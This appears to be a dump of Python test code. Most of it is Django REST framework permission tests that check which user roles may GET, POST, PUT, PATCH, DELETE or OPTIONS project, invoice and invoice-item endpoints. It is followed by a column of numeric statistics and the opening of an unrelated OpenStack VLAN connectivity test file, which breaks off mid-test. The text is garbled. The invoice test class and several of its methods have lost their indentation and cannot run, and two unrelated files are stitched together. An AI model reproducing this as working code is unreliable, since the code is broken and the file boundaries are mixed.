    def test_invalid_PUT_shared_projects(self):
        """A PUT on a shared item by the second project's user must be 403."""
        #self.skipTest("Temporarily skipped")
        # Create objects
        (client, uri,
         project_0, item_0,
         project_1, item_1) = self._create_shared_project_objects()
        # Share the default project's item with second project.
        item_0.process_shared_projects([project_1])
        # Test that the shared_project item cannot be updated by a second
        # project user.
        data = {}
        data['item_number'] = 'NE556N'
        data['project'] = reverse('project-detail',
                                  kwargs={'public_id': project_0.public_id})
        response = client.put(uri, data=data, **self.HEADERS)
        msg = "Response: {} should be {}, content: {}, uri: {}".format(
            response.status_code, status.HTTP_403_FORBIDDEN, response.data,
            uri)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN, msg)
        self.assertTrue(self._has_error(response), msg)
        self._test_errors(response, tests={
            'detail': "You do not have permission to perform this action.",
        })

    def test_invalid_PATCH_shared_projects(self):
        """A PATCH on a shared item by the second project's user must be 403."""
        #self.skipTest("Temporarily skipped")
        # Create objects
        (client, uri,
         project_0, item_0,
         project_1, item_1) = self._create_shared_project_objects()
        # Share the default project's item with second project.
        item_0.process_shared_projects([project_1])
        # Test that the shared_project item cannot be updated by a second
        # project user.
        data = {'item_number': 'NE556N'}
        response = client.patch(uri, data=data, **self.HEADERS)
        msg = "Response: {} should be {}, content: {}, uri: {}".format(
            response.status_code, status.HTTP_403_FORBIDDEN, response.data,
            uri)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN, msg)
        self.assertTrue(self._has_error(response), msg)
        self._test_errors(response, tests={
            'detail': "You do not have permission to perform this action.",
        })

    def test_invalid_DELETE_shared_projects(self):
        """A DELETE on a shared item by the second project's user must be 403."""
        #self.skipTest("Temporarily skipped")
        # Create objects
        (client, uri,
         project_0, item_0,
         project_1, item_1) = self._create_shared_project_objects()
        # Share the default project's item with second project.
        item_0.process_shared_projects([project_1])
        # Test that the shared_project item cannot be updated by a second
        # project user.
        response = client.delete(uri, **self.HEADERS)
        msg = "Response: {} should be {}, content: {}, uri: {}".format(
            response.status_code, status.HTTP_403_FORBIDDEN, response.data,
            uri)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN, msg)
        self.assertTrue(self._has_error(response), msg)
        self._test_errors(response, tests={
            'detail': "You do not have permission to perform this action.",
        })

    def test_check_user(self):
        """
        Test that a user is not authorized to access a project.
        """
        #self.skipTest("Temporarily skipped")
        # Create a 2nd user (login=False, so the request is unauthenticated).
        kwargs = {}
        kwargs['username'] = 'Second_User'
        kwargs['password'] = 'ykwQ37Ea'
        kwargs['is_active'] = True
        kwargs['is_staff'] = False
        kwargs['login'] = False
        kwargs['is_superuser'] = True
        kwargs['role'] = UserModel.DEFAULT_USER
        user, client = self._create_user(**kwargs)
        # Try to delete a project
        response = client.delete(self.project_uri, **self.HEADERS)
        msg = "Response: {} should be {}, content: {}, uri: {}".format(
            response.status_code, status.HTTP_403_FORBIDDEN, response.data,
            self.project_uri)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN, msg)
        self.assertTrue(self._has_error(response), msg)
        self._test_errors(response, tests={
            'detail': "Authentication credentials were not provided.",
        })
class TestInvoiceAPI(BaseTest, APITestCase):
def __init__(self, name):
super().__init__(name)
def setUp(self):
super().setUp()
# Create an InventoryType and Project.
in_type = self._create_inventory_type()
members = [
{'user': self.user, 'role_text': self.PROJECT_USER}
]
self.project = self._create_project(in_type, members=members)
self.project_uri = reverse(
'project-detail', kwargs={'public_id': self.project.public_id})
# Create regions
self.country = self._create_country()
self.currency = self._create_currency(
self.country, "US Dollar", "USD", 840, 2)
self.cur_uri = reverse('currency-detail',
kwargs={'pk': self.currency.pk})
self.supplier = self._create_supplier(self.project)
self.sup_uri = reverse('supplier-detail',
kwargs={'public_id': self.supplier.public_id})
def test_GET_invoice_list_with_invalid_permissions(self):
"""
Test the invoice_list endpoint with no permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'get'
invoice_number = "TEST12345"
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-list')
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_GET_invoice_list_with_valid_permissions(self):
"""
Test the invoice_list endpoint with valid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'get'
invoice_number = "TEST12345"
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-list')
self._test_users_with_valid_permissions(
uri, method, default_user=False)
self._test_project_users_with_valid_permissions(uri, method)
def test_POST_invoice_list_with_invalid_permissions(self):
"""
Test that a POST to invoice_list fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'post'
uri = reverse('invoice-list')
data = {}
su = data.setdefault('SU', {})
su['invoice_number'] = 'TEST12345'
su['project'] = self.project_uri
su['currency'] = self.cur_uri
su['supplier'] = self.sup_uri
data.setdefault('AD', su.copy())
data.setdefault('DU', su.copy())
self._test_users_with_invalid_permissions(
uri, method, request_data=data)
data.setdefault('POW', su.copy())
data.setdefault('PMA', su.copy())
data.setdefault('PDU', su.copy())
self._test_project_users_with_invalid_permissions(
uri, method, request_data=data)
def test_POST_invoice_list_with_valid_permissions(self):
"""
Test that a POST to invoice_list passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'post'
uri = reverse('invoice-list')
data = {}
su = data.setdefault('SU', {})
su['invoice_number'] = 'TEST123456'
su['project'] = self.project_uri
su['currency'] = self.cur_uri
su['supplier'] = self.sup_uri
ad = data.setdefault('AD', su.copy())
ad['invoice_number'] = 'TEST234561'
du = data.setdefault('DU', su.copy())
du['invoice_number'] = 'TEST345612'
self._test_users_with_valid_permissions(
uri, method, request_data=data)
pow = data.setdefault('POW', su.copy())
pow['invoice_number'] = 'TEST456123'
pma = data.setdefault('PMA', su.copy())
pma['invoice_number'] = 'TEST561234'
pdu = data.setdefault('PDU', su.copy())
pdu['invoice_number'] = 'TEST612345'
self._test_project_users_with_valid_permissions(
uri, method, project_user=False, request_data=data)
def test_OPTIONS_invoice_list_with_invalid_permissions(self):
"""
Test that the method OPTIONS fails with invald permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'options'
uri = reverse('invoice-list')
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_OPTIONS_invoice_list_with_valid_permissions(self):
"""
Test that the method OPTIONS brings back the correct data.
"""
method = 'options'
uri = reverse('invoice-list')
self._test_users_with_valid_permissions(uri, method)
self._test_project_users_with_valid_permissions(uri, method)
def test_GET_invoice_detail_with_invalid_permissions(self):
"""
Test that a GET on the invoice_detail fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
invoice_number = "TEST12345"
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-detail',
kwargs={'public_id': invoice.public_id})
method = 'get'
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_GET_invoice_detail_with_valid_permissions(self):
"""
Test that a GET to invoice_detail passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
invoice_number = "TEST12345"
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-detail',
kwargs={'public_id': invoice.public_id})
method = 'get'
self._test_users_with_valid_permissions(uri, method)
self._test_project_users_with_valid_permissions(uri, method)
def test_PUT_invoice_detail_with_invalid_permissions(self):
    """
    Test that a PUT to invoice_detail fails with invalid permissions.
    """
    #self.skipTest("Temporarily skipped")
    invoice = self._create_invoice(
        self.project, self.currency, self.supplier, "TEST12345")
    uri = reverse(
        'invoice-detail', kwargs={'public_id': invoice.public_id})
    method = 'put'
    # Every role submits the same full payload; all must be refused.
    base = {
        'invoice_number': 'TEST12345',
        'project': self.project_uri,
        'currency': self.cur_uri,
        'supplier': self.sup_uri,
        }
    data = {'SU': base, 'AD': dict(base), 'DU': dict(base)}
    self._test_users_with_invalid_permissions(
        uri, method, request_data=data)
    for role in ('POW', 'PMA', 'PDU'):
        data[role] = dict(base)
    self._test_project_users_with_invalid_permissions(
        uri, method, request_data=data)
def test_PUT_invoice_detail_with_valid_permissions(self):
    """
    Test that a PUT to invoice_detail passes with valid permissions.
    """
    #self.skipTest("Temporarily skipped")
    invoice = self._create_invoice(
        self.project, self.currency, self.supplier, "TEST1234567")
    uri = reverse(
        'invoice-detail', kwargs={'public_id': invoice.public_id})
    method = 'put'
    # Each role gets its own invoice number to avoid collisions.
    base = {
        'invoice_number': 'TEST2345671',
        'project': self.project_uri,
        'currency': self.cur_uri,
        'supplier': self.sup_uri,
        }
    data = {'SU': base}
    for role, number in (('AD', 'TEST3456712'), ('DU', 'TEST4567123')):
        entry = dict(base)
        entry['invoice_number'] = number
        data[role] = entry
    self._test_users_with_valid_permissions(
        uri, method, request_data=data)
    for role, number in (('POW', 'TEST5671234'), ('PMA', 'TEST6712345'),
                         ('PDU', 'TEST7123456')):
        entry = dict(base)
        entry['invoice_number'] = number
        data[role] = entry
    self._test_project_users_with_valid_permissions(
        uri, method, project_user=False, request_data=data)
def test_PATCH_invoice_detail_with_invalid_permissions(self):
    """
    Test that a PATCH to invoice_detail fails with invalid permissions.
    """
    #self.skipTest("Temporarily skipped")
    invoice = self._create_invoice(
        self.project, self.currency, self.supplier, "TEST1234567")
    uri = reverse(
        'invoice-detail', kwargs={'public_id': invoice.public_id})
    method = 'patch'
    # Every role submits the same partial payload; all must be refused.
    base = {
        'invoice_number': 'TEST2345671',
        'project': self.project_uri,
        }
    data = {'SU': base, 'AD': dict(base), 'DU': dict(base)}
    self._test_users_with_invalid_permissions(
        uri, method, request_data=data)
    for role in ('POW', 'PMA', 'PDU'):
        data[role] = dict(base)
    self._test_project_users_with_invalid_permissions(
        uri, method, request_data=data)
def test_PATCH_invoice_detail_with_valid_permissions(self):
    """
    Test that a PATCH to invoice_detail passes with valid permissions.
    """
    #self.skipTest("Temporarily skipped")
    invoice = self._create_invoice(
        self.project, self.currency, self.supplier, "TEST1234567")
    uri = reverse(
        'invoice-detail', kwargs={'public_id': invoice.public_id})
    method = 'patch'
    # Each role patches a distinct invoice number.
    data = {}
    for role, number in (('SU', 'TEST2345671'), ('AD', 'TEST3456712'),
                         ('DU', 'TEST4567123')):
        data[role] = {'invoice_number': number}
    self._test_users_with_valid_permissions(
        uri, method, request_data=data)
    for role, number in (('POW', 'TEST5671234'), ('PMA', 'TEST6712345'),
                         ('PDU', 'TEST7123456')):
        data[role] = {'invoice_number': number}
    self._test_project_users_with_valid_permissions(
        uri, method, project_user=False, request_data=data)
def test_DELETE_invoice_detail_with_invalid_permissions(self):
    """
    Test that a DELETE to invoice_detail fails with invalid permissions.
    """
    #self.skipTest("Temporarily skipped")
    method = 'delete'
    invoice = self._create_invoice(
        self.project, self.currency, self.supplier, "TEST1234567")
    uri = reverse(
        'invoice-detail', kwargs={'public_id': invoice.public_id})
    self._test_users_with_invalid_permissions(uri, method)
    self._test_project_users_with_invalid_permissions(uri, method)
def test_DELETE_invoice_detail_with_valid_permissions(self):
    """
    Test that a DELETE to invoice_detail pass' with valid permissions.
    """
    #self.skipTest("Temporarily skipped")
    method = 'delete'
    # DEFAULT_USER and PROJECT_USER have no access, so only the four
    # privileged roles are exercised.  A fresh invoice is created for
    # each role because a successful DELETE removes it; the follow-up
    # GET must then report an error.
    role_tests = (
        self._test_superuser_with_valid_permissions,        # SUPERUSER
        self._test_administrator_with_valid_permissions,    # ADMINISTRATOR
        self._test_project_owner_with_valid_permissions,    # PROJECT_OWNER
        self._test_project_manager_with_valid_permissions,  # PROJECT_MANAGER
        )
    for role_test in role_tests:
        invoice = self._create_invoice(
            self.project, self.currency, self.supplier, "TEST1234567")
        uri = reverse(
            'invoice-detail', kwargs={'public_id': invoice.public_id})
        role_test(uri, method)
        self._test_valid_GET_with_errors(uri)
def test_OPTIONS_invoice_detail_with_invalid_permissions(self):
    """
    Test that the method OPTIONS fails with invalid permissions.
    """
    #self.skipTest("Temporarily skipped")
    method = 'options'
    invoice = self._create_invoice(
        self.project, self.currency, self.supplier, "TEST1234567")
    uri = reverse(
        'invoice-detail', kwargs={'public_id': invoice.public_id})
    self._test_users_with_invalid_permissions(uri, method)
    self._test_project_users_with_invalid_permissions(uri, method)
def test_OPTIONS_invoice_detail_with_valid_permissions(self):
    """
    Test that the method OPTIONS brings back the correct data.
    """
    #self.skipTest("Temporarily skipped")
    method = 'options'
    invoice = self._create_invoice(
        self.project, self.currency, self.supplier, "TEST1234567")
    uri = reverse(
        'invoice-detail', kwargs={'public_id': invoice.public_id})
    self._test_users_with_valid_permissions(uri, method)
    self._test_project_users_with_valid_permissions(uri, method)
class TestInvoiceItemAPI(BaseTest, APITestCase):
    """
    Permission tests for the invoice-item list and detail API endpoints.
    """

    def __init__(self, name):
        super().__init__(name)

    def setUp(self):
        """
        Build the fixtures every test needs: a project with self.user as a
        PROJECT_USER member, a currency, a supplier, an invoice (and its
        detail URI), and a ColumnCollection for the 'item' related model.
        """
        super().setUp()
        # Create an InventoryType and Project.
        in_type = self._create_inventory_type()
        members = [
            {'user': self.user, 'role_text': self.PROJECT_USER}
            ]
        self.project = self._create_project(in_type, members=members)
        # Create regions
        country = self._create_country()
        currency = self._create_currency(country, "US Dollar", "USD", 840, 2)
        supplier = self._create_supplier(self.project)
        # Create Invoice
        self.invoice = self._create_invoice(
            self.project, currency, supplier, "TEST01234567")
        self.inv_uri = reverse('invoice-detail',
                               kwargs={'public_id': self.invoice.public_id})
        # Create a ColumnCollection
        kwargs = {}
        kwargs['name'] = "Test Collection"
        kwargs['related_model'] = 'item'
        kwargs['creator'] = self.user
        kwargs['updater'] = self.user
        self.collection = ColumnCollection(**kwargs)
        self.collection.save()

    def test_GET_invoice_item_list_with_invalid_permissions(self):
        """
        Test the invoice_item_list endpoint with no permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'get'
        item_number = "TEST123456"
        # Fixture only -- the list endpoint itself is what is under test.
        invoice_item = self._create_invoice_item(
            self.invoice, item_number, 5, '1.50')
        uri = reverse('invoice-item-list')
        self._test_users_with_invalid_permissions(uri, method)
        self._test_project_users_with_invalid_permissions(uri, method)

    def test_GET_invoice_item_list_with_valid_permissions(self):
        """
        Test the invoice_item_list endpoint with valid permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'get'
        item_number = "TEST123456"
        invoice_item = self._create_invoice_item(
            self.invoice, item_number, 5, '1.50')
        uri = reverse('invoice-item-list')
        self._test_users_with_valid_permissions(uri, method,
                                                default_user=False)
        self._test_project_users_with_valid_permissions(uri, method)

    def test_POST_invoice_item_list_with_invalid_permissions(self):
        """
        Test that a POST to invoice_item_list fails with invalid permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'post'
        uri = reverse('invoice-item-list')
        # Same payload for every role; all must be refused.
        data = {}
        su = data.setdefault('SU', {})
        su['item_number'] = 'TEST123456'
        su['quantity'] = 5
        su['unit_price'] = '1.50'
        su['invoice'] = self.inv_uri
        data.setdefault('AD', su.copy())
        data.setdefault('DU', su.copy())
        self._test_users_with_invalid_permissions(
            uri, method, request_data=data)
        data.setdefault('POW', su.copy())
        data.setdefault('PMA', su.copy())
        data.setdefault('PDU', su.copy())
        self._test_project_users_with_invalid_permissions(
            uri, method, request_data=data)

    def test_POST_invoice_item_list_with_valid_permissions(self):
        """
        Test that a POST to invoice_item_list passes with valid permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'post'
        uri = reverse('invoice-item-list')
        # Each role posts a distinct item number to avoid collisions.
        data = {}
        su = data.setdefault('SU', {})
        su['item_number'] = 'TEST123456'
        su['quantity'] = 5
        su['unit_price'] = '1.50'
        su['invoice'] = self.inv_uri
        ad = data.setdefault('AD', su.copy())
        ad['item_number'] = 'TEST234561'
        du = data.setdefault('DU', su.copy())
        du['item_number'] = 'TEST345612'
        self._test_users_with_valid_permissions(
            uri, method, request_data=data)
        pow = data.setdefault('POW', su.copy())
        pow['item_number'] = 'TEST456123'
        pma = data.setdefault('PMA', su.copy())
        pma['item_number'] = 'TEST561234'
        pdu = data.setdefault('PDU', su.copy())
        pdu['item_number'] = 'TEST612345'
        self._test_project_users_with_valid_permissions(
            uri, method, project_user=False, request_data=data)

    def test_OPTIONS_invoice_item_list_with_invalid_permissions(self):
        """
        Test that the method OPTIONS fails with invalid permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'options'
        uri = reverse('invoice-item-list')
        self._test_users_with_invalid_permissions(uri, method)
        self._test_project_users_with_invalid_permissions(uri, method)

    def test_OPTIONS_invoice_item_list_with_valid_permissions(self):
        """
        Test that the method OPTIONS brings back the correct data.
        """
        method = 'options'
        uri = reverse('invoice-item-list')
        self._test_users_with_valid_permissions(uri, method)
        self._test_project_users_with_valid_permissions(uri, method)

    def test_GET_invoice_item_detail_with_invalid_permissions(self):
        """
        Test that a GET on the invoice_item_detail fails with invalid
        permissions.
        """
        #self.skipTest("Temporarily skipped")
        item_number = "TEST12345"
        invoice_item = self._create_invoice_item(
            self.invoice, item_number, 5, '1.50')
        uri = reverse('invoice-item-detail',
                      kwargs={'public_id': invoice_item.public_id})
        method = 'get'
        self._test_users_with_invalid_permissions(uri, method)
        self._test_project_users_with_invalid_permissions(uri, method)

    def test_GET_invoice_item_detail_with_valid_permissions(self):
        """
        Test that a GET to invoice_item_detail passes with valid permissions.
        """
        #self.skipTest("Temporarily skipped")
        item_number = "TEST12345"
        invoice_item = self._create_invoice_item(
            self.invoice, item_number, 5, '1.50')
        uri = reverse('invoice-item-detail',
                      kwargs={'public_id': invoice_item.public_id})
        method = 'get'
        self._test_users_with_valid_permissions(uri, method)
        self._test_project_users_with_valid_permissions(uri, method)

    def test_PUT_invoice_item_detail_with_invalid_permissions(self):
        """
        Test that a PUT to invoice_item_detail fails with invalid permissions.
        """
        #self.skipTest("Temporarily skipped")
        item_number = "TEST12345"
        invoice_item = self._create_invoice_item(
            self.invoice, item_number, 5, '1.50')
        uri = reverse('invoice-item-detail',
                      kwargs={'public_id': invoice_item.public_id})
        method = 'put'
        data = {}
        su = data.setdefault('SU', {})
        su['item_number'] = 'TEST12345'
        su['quantity'] = 5
        su['unit_price'] = '1.50'
        su['invoice'] = self.inv_uri
        data.setdefault('AD', su.copy())
        data.setdefault('DU', su.copy())
        self._test_users_with_invalid_permissions(
            uri, method, request_data=data)
        data.setdefault('POW', su.copy())
        data.setdefault('PMA', su.copy())
        data.setdefault('PDU', su.copy())
        self._test_project_users_with_invalid_permissions(
            uri, method, request_data=data)

    def test_PUT_invoice_item_detail_with_valid_permissions(self):
        """
        Test that a PUT to invoice_item_detail passes with valid permissions.
        """
        #self.skipTest("Temporarily skipped")
        item_number = "TEST1234567"
        invoice_item = self._create_invoice_item(
            self.invoice, item_number, 5, '1.50')
        uri = reverse('invoice-item-detail',
                      kwargs={'public_id': invoice_item.public_id})
        method = 'put'
        # Each role submits a distinct item number.
        data = {}
        su = data.setdefault('SU', {})
        su['item_number'] = 'TEST2345671'
        su['quantity'] = 5
        su['unit_price'] = '1.50'
        su['invoice'] = self.inv_uri
        ad = data.setdefault('AD', su.copy())
        ad['item_number'] = 'TEST3456712'
        du = data.setdefault('DU', su.copy())
        du['item_number'] = 'TEST4567123'
        self._test_users_with_valid_permissions(
            uri, method, request_data=data)
        pow = data.setdefault('POW', su.copy())
        pow['item_number'] = 'TEST5671234'
        pma = data.setdefault('PMA', su.copy())
        pma['item_number'] = 'TEST6712345'
        pdu = data.setdefault('PDU', su.copy())
        pdu['item_number'] = 'TEST7123456'
        self._test_project_users_with_valid_permissions(
            uri, method, project_user=False, request_data=data)

    def test_PATCH_invoice_item_detail_with_invalid_permissions(self):
        """
        Test that a PATCH to invoice_item_detail fails with invalid
        permissions.
        """
        #self.skipTest("Temporarily skipped")
        item_number = "TEST1234567"
        invoice_item = self._create_invoice_item(
            self.invoice, item_number, 5, '1.50')
        uri = reverse('invoice-item-detail',
                      kwargs={'public_id': invoice_item.public_id})
        method = 'patch'
        data = {}
        su = data.setdefault('SU', {})
        su['item_number'] = 'TEST2345671'
        su['quantity'] = 5
        su['unit_price'] = '1.50'
        su['invoice'] = self.inv_uri
        data.setdefault('AD', su.copy())
        data.setdefault('DU', su.copy())
        self._test_users_with_invalid_permissions(
            uri, method, request_data=data)
        data.setdefault('POW', su.copy())
        data.setdefault('PMA', su.copy())
        data.setdefault('PDU', su.copy())
        self._test_project_users_with_invalid_permissions(
            uri, method, request_data=data)

    def test_PATCH_invoice_item_detail_with_valid_permissions(self):
        """
        Test that a PATCH to invoice_item_detail passes with valid
        permissions.
        """
        #self.skipTest("Temporarily skipped")
        item_number = "TEST1234567"
        invoice_item = self._create_invoice_item(
            self.invoice, item_number, 5, '1.50')
        uri = reverse('invoice-item-detail',
                      kwargs={'public_id': invoice_item.public_id})
        method = 'patch'
        # Partial update: each role patches only its own item number.
        data = {}
        su = data.setdefault('SU', {})
        su['item_number'] = 'TEST2345671'
        ad = data.setdefault('AD', {})
        ad['item_number'] = 'TEST3456712'
        du = data.setdefault('DU', {})
        du['item_number'] = 'TEST4567123'
        self._test_users_with_valid_permissions(
            uri, method, request_data=data)
        pow = data.setdefault('POW', {})
        pow['item_number'] = 'TEST5671234'
        pma = data.setdefault('PMA', {})
        pma['item_number'] = 'TEST6712345'
        pdu = data.setdefault('PDU', {})
        pdu['item_number'] = 'TEST7123456'
        self._test_project_users_with_valid_permissions(
            uri, method, project_user=False, request_data=data)

    def test_DELETE_invoice_item_detail_with_invalid_permissions(self):
        """
        Test that a DELETE to invoice_item_detail fails with invalid
        permissions.
        """
        #self.skipTest("Temporarily skipped")
        item_number = "TEST1234567"
        method = 'delete'
        invoice_item = self._create_invoice_item(
            self.invoice, item_number, 5, '1.50')
        uri = reverse('invoice-item-detail',
                      kwargs={'public_id': invoice_item.public_id})
        self._test_users_with_invalid_permissions(uri, method)
        self._test_project_users_with_invalid_permissions(uri, method)

    def test_DELETE_invoice_item_detail_with_valid_permissions(self):
        """
        Test that a DELETE to invoice_item_detail pass' with valid
        permissions.
        """
        #self.skipTest("Temporarily skipped")
        item_number = "TEST1234567"
        method = 'delete'
        # A fresh item is created per role because a successful DELETE
        # removes it; the follow-up GET must then report an error.
        # Test SUPERUSER
        invoice_item = self._create_invoice_item(
            self.invoice, item_number, 5, '1.50')
        uri = reverse('invoice-item-detail',
                      kwargs={'public_id': invoice_item.public_id})
        self._test_superuser_with_valid_permissions(uri, method)
        self._test_valid_GET_with_errors(uri)
        # Test ADMINISTRATOR
        invoice_item = self._create_invoice_item(
            self.invoice, item_number, 5, '1.50')
        uri = reverse('invoice-item-detail',
                      kwargs={'public_id': invoice_item.public_id})
        self._test_administrator_with_valid_permissions(uri, method)
        self._test_valid_GET_with_errors(uri)
        # Test DEFAULT_USER
        ## This is an invalid test since the DEFAULT_USER has no access.
        # Test PROJECT_OWNER
        invoice_item = self._create_invoice_item(
            self.invoice, item_number, 5, '1.50')
        uri = reverse('invoice-item-detail',
                      kwargs={'public_id': invoice_item.public_id})
        self._test_project_owner_with_valid_permissions(uri, method)
        self._test_valid_GET_with_errors(uri)
        # Test PROJECT_MANAGER
        invoice_item = self._create_invoice_item(
            self.invoice, item_number, 5, '1.50')
        uri = reverse('invoice-item-detail',
                      kwargs={'public_id': invoice_item.public_id})
        self._test_project_manager_with_valid_permissions(uri, method)
        self._test_valid_GET_with_errors(uri)
        # Test PROJECT_USER
        ## This is an invalid test since the PROJECT_USER has no access.

    def test_OPTIONS_invoice_item_detail_with_invalid_permissions(self):
        """
        Test that the method OPTIONS fails with invalid permissions.
        """
        #self.skipTest("Temporarily skipped")
        item_number = "TEST1234567"
        method = 'options'
        invoice_item = self._create_invoice_item(
            self.invoice, item_number, 5, '1.50')
        uri = reverse('invoice-item-detail',
                      kwargs={'public_id': invoice_item.public_id})
        self._test_users_with_invalid_permissions(uri, method)
        self._test_project_users_with_invalid_permissions(uri, method)

    def test_OPTIONS_invoice_item_detail_with_valid_permissions(self):
        """
        Test that the method OPTIONS brings back the correct data.
        """
        #self.skipTest("Temporarily skipped")
        item_number = "TEST1234567"
        method = 'options'
        invoice_item = self._create_invoice_item(
            self.invoice, item_number, 5, '1.50')
        uri = reverse('invoice-item-detail',
                      kwargs={'public_id': invoice_item.public_id})
        self._test_users_with_valid_permissions(uri, method)
        self._test_project_users_with_valid_permissions(uri, method)
| 41.780778
| 78
| 0.629919
| 6,023
| 52,602
| 5.206708
| 0.037523
| 0.047194
| 0.070153
| 0.042538
| 0.940051
| 0.934503
| 0.924585
| 0.908418
| 0.889541
| 0.863616
| 0
| 0.019165
| 0.25999
| 52,602
| 1,258
| 79
| 41.81399
| 0.786467
| 0.145052
| 0
| 0.822248
| 0
| 0
| 0.115715
| 0.003177
| 0
| 0
| 0
| 0
| 0.012615
| 1
| 0.081422
| false
| 0.002294
| 0.009174
| 0
| 0.09633
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
472ebf1f9f191e92071dff1acb971c26e00bd55f
| 20,187
|
py
|
Python
|
package/tests/test_cp/test_openstack/test_domain/test_services/test_connectivity/test_vlan_connectivity_service.py
|
QualiSystems/OpenStack-Shell
|
2e218ee249867550332a9b887a7c50b76ad52e20
|
[
"ISC"
] | 1
|
2016-07-06T19:59:33.000Z
|
2016-07-06T19:59:33.000Z
|
package/tests/test_cp/test_openstack/test_domain/test_services/test_connectivity/test_vlan_connectivity_service.py
|
QualiSystems/OpenStack-Shell
|
2e218ee249867550332a9b887a7c50b76ad52e20
|
[
"ISC"
] | 256
|
2016-07-06T17:02:55.000Z
|
2020-10-01T09:35:03.000Z
|
package/tests/test_cp/test_openstack/test_domain/test_services/test_connectivity/test_vlan_connectivity_service.py
|
QualiSystems/OpenStack-Shell
|
2e218ee249867550332a9b887a7c50b76ad52e20
|
[
"ISC"
] | 1
|
2017-05-16T20:24:57.000Z
|
2017-05-16T20:24:57.000Z
|
from unittest import TestCase
from mock import Mock
from cloudshell.cp.openstack.domain.services.connectivity.vlan_connectivity_service import VLANConnectivityService
from cloudshell.cp.openstack.models.connectivity_action_resource_info import ConnectivityActionResourceInfo
from cloudshell.cp.openstack.common.deploy_data_holder import DeployDataHolder
import jsonpickle
class TestVlanConnectivityService(TestCase):
def setUp(self):
self.instance_service = Mock()
self.network_service = Mock()
self.connectivity_service = VLANConnectivityService(instance_service=self.instance_service,
network_service=self.network_service)
self.os_session = Mock()
self.mock_logger = Mock()
def test_set_vlan_actions_net_create_or_get_fail(self):
mock_cp_resource_model = Mock()
mock_test_value = 'test_value'
test_vlan_actions = {1 : mock_test_value, 2: mock_test_value}
self.connectivity_service.network_service.create_or_get_network_with_segmentation_id = Mock(return_value=None)
self.connectivity_service.set_fail_results = Mock(return_value='fail_result')
results = self.connectivity_service.set_vlan_actions(openstack_session=self.os_session,
cp_resource_model=mock_cp_resource_model,
vlan_actions=test_vlan_actions,
logger=self.mock_logger)
assert self.connectivity_service.set_fail_results.call_count == 2
self.assertTrue(results, ['fail_result', 'fail_result'])
def test_set_vlan_actions_net_create_or_get_success_no_subnet_subnet_create_fail(self):
mock_cp_resource_model = Mock()
mock_test_value = 'test_value'
test_vlan_actions = {1 : mock_test_value, 2: mock_test_value}
mock_create_or_get_result = {'id': 'test_net_id', 'subnets' : []}
self.connectivity_service.network_service.create_or_get_network_with_segmentation_id = Mock(
return_value=mock_create_or_get_result)
self.connectivity_service.network_service.create_and_attach_subnet_to_net = Mock(return_value=None)
self.connectivity_service.set_fail_results = Mock(return_value='fail_result')
results = self.connectivity_service.set_vlan_actions(openstack_session=self.os_session,
cp_resource_model=mock_cp_resource_model,
vlan_actions=test_vlan_actions,
logger=self.mock_logger)
failure_text = 'Failed to attach Subnet to Network test_net_id. Error: empty_subnet'
self.connectivity_service.set_fail_results.assert_any_call(values='test_value',
action_type='setVlan',
failure_text=failure_text)
assert self.connectivity_service.set_fail_results.call_count == 2
self.assertTrue(results, ['fail_result', 'fail_result'])
def test_set_vlan_actions_net_create_or_get_success_subnet_success(self):
mock_cp_resource_model = Mock()
mock_test_value = 'test_value'
test_vlan_actions = {1 : mock_test_value, 2: mock_test_value}
mock_create_or_get_result = {'id': 'test_net_id', 'subnets' : []}
self.connectivity_service.network_service.create_or_get_network_with_segmentation_id = Mock(
return_value=mock_create_or_get_result)
self.connectivity_service.network_service.create_and_attach_subnet_to_net = Mock(return_value='test_subnet')
self.connectivity_service.attach_nic_to_instance_action_result = Mock(return_value='Success')
results = self.connectivity_service.set_vlan_actions(openstack_session=self.os_session,
cp_resource_model=mock_cp_resource_model,
vlan_actions=test_vlan_actions,
logger=self.mock_logger)
self.assertTrue(results, ['Success', 'Success'])
def test_remove_vlan_actions_get_network_service_no_net(self):
mock_cp_resource_model = Mock()
mock_test_value = 'test_value'
test_vlan_actions = {1: mock_test_value, 2: mock_test_value}
self.connectivity_service.network_service.get_network_with_segmentation_id = Mock(return_value=None)
self.connectivity_service.set_fail_results = Mock(return_value='fail_result')
results = self.connectivity_service.remove_vlan_actions(openstack_session=self.os_session,
cp_resource_model=mock_cp_resource_model,
vlan_actions=test_vlan_actions,
logger=self.mock_logger)
assert self.connectivity_service.set_fail_results.call_count == 2
self.assertTrue(results, ['fail_result', 'fail_result'])
def test_remove_vlan_actions_get_network_service_net_found(self):
mock_cp_resource_model = Mock()
mock_test_value = 'test_value'
test_vlan_actions = {1: mock_test_value, 2: mock_test_value}
mock_get_network_with_vlanid_result = {'id' : 'test-net-id'}
